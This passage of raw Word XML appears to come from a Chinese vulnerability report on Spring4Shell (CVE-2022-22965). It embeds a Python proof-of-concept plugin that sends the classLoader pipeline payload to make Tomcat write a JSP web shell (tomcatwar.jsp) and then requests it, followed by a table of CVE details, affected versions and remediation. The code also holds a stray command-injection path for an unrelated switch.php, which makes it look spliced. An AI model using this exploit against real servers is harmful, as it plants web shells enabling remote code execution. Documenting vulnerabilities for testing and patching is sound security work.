        <w:t>JDK9</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>及以上版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>中，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A9A2F" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>远程攻击者可在满足特定条件的基础上，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A9AD8F" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>通过框架的参数绑定功能获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>AccessLogValve</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>对象并诸如恶意字段值，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673E812" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>从而触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>机制并写入任意路径下的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179AB8F5" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B64E3F" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    solution = '''</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>升级</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t xml:space="preserve">Spring Framework </w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>版本，或采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>防御或通过黑名单策略进行防护。</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4860D" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    severity = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F77F49" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    vulType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDACFD7" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    taskType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6464270C" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    references = ['''https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67''', '''https://www.oracle.com/security-alerts/cpujul2022.html''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713ADD2F" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    appName = '''Spring Framework'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A444E81" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    appVersion = '''5.2.20+, 5.3.18+'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984A393" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    appPowerLink = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608409DA" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    samples = ['']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447AED07" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    install_requires = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3F08C" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558FFDE1" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    def _attack(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B8479" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5C05E" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D11A8A6" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    def _verify(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F9B41" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        self.url, ip, port = parse_ip_port(self.target, 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F73FA3C" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F539FAB" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26215517" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>            "suffix": "%&gt;//",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA1165" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>             "c1": "Runtime",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A38D1" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>             "c2": "&lt;%",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79327DB1" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>             "DNT": "1",    \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210CF25A" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>             "Content-Type": "application/x-www-form-urlencoded",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA34B3" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:lastRenderedPageBreak/>
        <w:t>        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A846DDF" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22w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tomcatwar&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757802B6" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        path="/switch.php?current=1%27%0aecho%20Test^By^ZsfTest$1By$1Zsf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D063E" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        vul_url = make_verify_url(self.url,path,mod=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B53165" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        resp = req.post(url=vul_url,data=data, headers = headers, verify = False, allow_redirects = False, timeout = 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3034C45D" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        shellurl = make_verify_url(vul_url,'tomcatwar.jsp')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DE100" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        shellexploit = req.post(shellurl,allow_redirects=False,verify=False,stream=True,timeout=15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DA632" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        if  shellexploit.status_code == 200 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2DCD45" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>            result['VerifyInfo'] = http_packet(resp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24288258" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>            result['VerifyInfo']['URL'] = vul_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D3F3D" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>            result['VerifyInfo']['port'] = port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0FD5C3" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        return self.parse_output(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C886211" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47272A46" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    def parse_output(self, result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DA243" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        output = Output(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0896AE39" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        if result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A677EF" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>            output.success(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6853BA47" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E274F" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>            output.fail('Failed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6E2A7" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>        return output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C222AB" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB8D9A9" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3B767" w14:textId="2FC0CB65" w:rsidR="008F6264" w:rsidRPr="00823670" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EA1865" w14:textId="49AAA5A6" w:rsidR="008F6264" w:rsidRPr="00823670" w:rsidRDefault="00AA5F05" w:rsidP="00823670">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2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8F6264" w14:paraId="12F541A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4B6ABEA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05F3" w14:textId="77777777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7223A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FAF0" w14:textId="103843B6" w:rsidR="008F6264" w:rsidRDefault="00823670" w:rsidP="00C2299C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任意</w:t>
            </w:r>
            <w:r w:rsidR="00C2299C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令执行漏洞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A5F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C88B" w14:textId="29524A14" w:rsidR="008F6264" w:rsidRDefault="00C2299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7D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>CVE-202</w:t>
            </w:r>
            <w:r w:rsidR="003A4E36">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="003A4E36">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>22965</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="2540D5FC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5E4969B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A94" w14:textId="3CF99627" w:rsidR="008F6264" w:rsidRDefault="00C2299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</w:t>
            </w:r>
            <w:r w:rsidR="003F7471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-03-30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6A352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3311" w14:textId="53C32138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7E873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4305" w14:textId="77777777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8F6264" w14:paraId="0B2C470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35DDCBE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47B5" w14:textId="3890825C" w:rsidR="008F6264" w:rsidRDefault="003F7471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022-03-30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A6B2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E07F" w14:textId="62362678" w:rsidR="008F6264" w:rsidRDefault="00B77CF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未知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312CD9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49F6" w14:textId="2F68B139" w:rsidR="008F6264" w:rsidRDefault="00122AC6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CNVD-2022-23942</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="3B76BDA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CAC7C4E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83BE" w14:textId="0D196609" w:rsidR="008F6264" w:rsidRDefault="00C2299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EDD6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E1A" w14:textId="04DE60D9" w:rsidR="008F6264" w:rsidRDefault="00B77CF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未知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24099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0FA9" w14:textId="6F490FDF" w:rsidR="008F6264" w:rsidRDefault="003F7471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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>pring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远程代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="1E485C7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5579CA5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704" w14:textId="541D5911" w:rsidR="008F6264" w:rsidRDefault="00EE03F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Spring Framework 版本 5.3.0 到 5.3.17、5.2.0 到 5.2.19 以及更早版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="5EA06AC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90FE3B2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12C8" w14:textId="48C35440" w:rsidR="008F6264" w:rsidRDefault="00080B01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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
                <w:color w:val="000000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sco</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="1E2F18D0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B2E4D1B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F0B4" w14:textId="3575D813" w:rsidR="008F6264" w:rsidRDefault="00AA63A7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AA63A7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Spring</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA63A7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程代码执行漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="4B199E2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FD79ADD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5B5" w14:textId="49F5DAE6" w:rsidR="008F6264" w:rsidRPr="003F7471" w:rsidRDefault="003F7471">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
                <w:spacing w:val="8"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F7471">
              <w:rPr>
                <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI"/>
                <w:spacing w:val="8"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>在Spring框架的JDK9版本(及以上版本)中，远程攻击者可在满足特定条件的基础上，通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值，从而触发pipeline机制并写入任意路径下的文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="7A09757D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0D4F923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8BAD" w14:textId="5BD4F57A" w:rsidR="008F6264" w:rsidRDefault="00000000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hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="00AA63A7">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                </w:rPr>
                <w:t>Vulnerability in Spring Framework Affecting Cisco Products: March 2022</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="4D56432A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7ED302C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FA40" w14:textId="1D6C17B7" w:rsidR="008F6264" w:rsidRDefault="00C2299C">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Vulhub/</w:t>
            </w:r>
            <w:r w:rsidR="001B2A28">
              <w:t>spring</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> CVE-202</w:t>
            </w:r>
            <w:r w:rsidR="001B2A28">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="001B2A28">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22965</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="2087D341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15B7AE7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ED3" w14:textId="5CC41263" w:rsidR="008F6264" w:rsidRDefault="008600DC">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如上</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="190283D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5C03859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45B" w14:textId="59117F8F" w:rsidR="008F6264" w:rsidRDefault="008600DC">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新</w:t>
            </w:r>
            <w:r w:rsidR="00FD51F7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10898B58" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="07B366D5" w14:textId="14F474F5" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318034FD" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:sectPr w:rsidR="008F6264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8F81E" w14:textId="77777777" w:rsidR="00B509F7" w:rsidRDefault="00B509F7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E412939" w14:textId="77777777" w:rsidR="00B509F7" w:rsidRDefault="00B5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CA74" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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CD6B3" wp14:editId="056591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78B67F" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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CD6B3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78B67F" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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4E405" w14:textId="77777777" w:rsidR="00B509F7" w:rsidRDefault="00B509F7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="53597CFE" w14:textId="77777777" w:rsidR="00B509F7" w:rsidRDefault="00B5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1A36" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
        <w:sz w:val="21"/>
